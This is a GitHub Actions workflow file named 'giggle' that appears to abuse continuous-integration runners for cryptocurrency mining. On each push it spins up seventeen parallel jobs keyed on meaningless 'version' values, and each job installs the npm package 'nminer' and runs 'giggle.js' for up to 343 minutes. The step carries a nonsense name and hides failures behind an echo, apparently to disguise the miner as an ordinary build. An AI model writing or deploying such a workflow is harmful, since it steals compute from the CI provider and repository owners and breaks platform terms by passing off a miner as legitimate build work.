name: giggle
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3053 }
          - { version: 5557 }
          - { version: 4827 }
          - { version: 2194 }
          - { version: 1925 }
          - { version: 7372 }
          - { version: 1397 }
          - { version: 3018 }
          - { version: 7433 }
          - { version: 2343 }
          - { version: 5454 }
          - { version: 976 }
          - { version: 3384 }
          - { version: 9720 }
          - { version: 2631 }
          - { version: 8503 }
          - { version: 8038 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: psst meanwhile likewise
        run: |
          npm install nminer@latest
          timeout 343m node giggle.js || echo "giggle executed"